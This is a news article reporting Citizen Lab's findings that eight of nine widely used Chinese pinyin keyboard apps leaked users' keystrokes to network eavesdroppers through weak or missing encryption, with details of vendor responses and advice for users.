Major security flaws expose keystrokes of nearly 1 billion Chinese pinyin keyboard app users, Citizen Lab finds

A serious set of security flaws left the keystrokes of close to one billion people using cloud-based pinyin keyboard apps open to interception. An interdisciplinary research group at the University of Toronto known as the Citizen Lab found vulnerabilities in eight of nine widely used apps, leaving what users typed exposed to “network eavesdroppers.”

The weaknesses stemmed from how the apps handled keystroke data as it traveled to the cloud for prediction. Citizen Lab found problems in the keyboards from Baidu, Honor, iFlytek, OPPO, Samsung, Tencent (QQ Pinyin), Vivo, and Xiaomi. The lone exception was Huawei, whose keyboard the researchers found was not vulnerable.

In their report, formally titled “The not-so-silent type: Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers” and published on April 23, 2024, researchers Jeffrey Knockel, Mona Wang, and Zoë Reichert warned that the flaws could let attackers completely reveal what users were typing in transit. The findings built on the lab’s earlier work from August 2023, when it identified cryptographic weaknesses in Tencent’s Sogou Input Method.

Because Chinese has tens of thousands of characters that cannot fit on a standard keyboard, users rely on Input Method Editors (IMEs), most commonly pinyin, which spells out Mandarin sounds using the Latin alphabet. To handle complex predictions, many of these keyboards send keystrokes to remote servers, and it is that cloud transmission that the researchers found poorly protected. The apps examined account for more than 95 percent of the third-party keyboard market in China, with IMEs from Sogou, Baidu, and iFlytek making up a large share. Among the specific issues identified were:

• Tencent QQ Pinyin: Vulnerable to a CBC padding oracle attack that could expose typed content.
• Baidu IME (Windows): Network traffic could be decrypted, revealing typed text because of a flawed encryption protocol.
• iFlytek IME (Android): Insufficient encryption allowed attackers to recover user input.
• Samsung Keyboard (Android): Keystroke data was transmitted entirely unencrypted.
• Pre-installed keyboards: Devices from Xiaomi, OPPO, Vivo, and Honor shipped with keyboards built on Baidu, iFlytek, and Sogou, inheriting their weaknesses.

What made the flaws especially dangerous is that an attacker could read keystrokes entirely passively, simply by observing network traffic, without sending anything to the target. The researchers stressed that the vulnerabilities were both easy to find and easy to exploit, requiring no real technical sophistication.

Following Citizen Lab’s responsible disclosure, most vendors moved to fix the problems. As of April 1, 2024, however, two notable holdouts remained: the researchers reported they still had working exploits against Honor’s keyboard app and Tencent’s QQ Pinyin. Baidu had addressed the most serious issues but had not fixed everything reported to it, while Vivo and Xiaomi did not respond to the disclosures at all.

To reduce the risk, users were advised to keep their apps and operating systems updated, switch to a keyboard that processes data entirely on-device, and favor well-established encryption protocols over custom solutions. Citizen Lab specifically recommended that QQ Pinyin users switch keyboards and that owners of Honor devices disable the pre-installed Baidu keyboard. The researchers also called on app stores to stop geoblocking security updates so that fixes can reach everyone, and on developers to ensure data is properly encrypted in transit.

A likely root cause, the researchers suggested, is that many of these apps were built in the 2000s, before the modern TLS encryption standard became common in software, and that some Chinese developers have been reluctant to adopt Western encryption standards over fears they may contain hidden backdoors, leading them to rely on homegrown ciphers that proved unreliable. Notably, Citizen Lab cast doubt on the theory that the flaws were deliberate government backdoors, reasoning that state authorities have other means of collecting such data and consistently push for stronger software security.

Even so, the researchers cautioned that the sheer scope of the problem, the sensitivity of typed data such as passwords and messages, and the ease of exploitation meant that state actors with a history of seizing on flaws like these could potentially have used them for mass surveillance. For more reporting on data breaches and digital privacy threats, see The Aegis Alliance’s Hacker News coverage.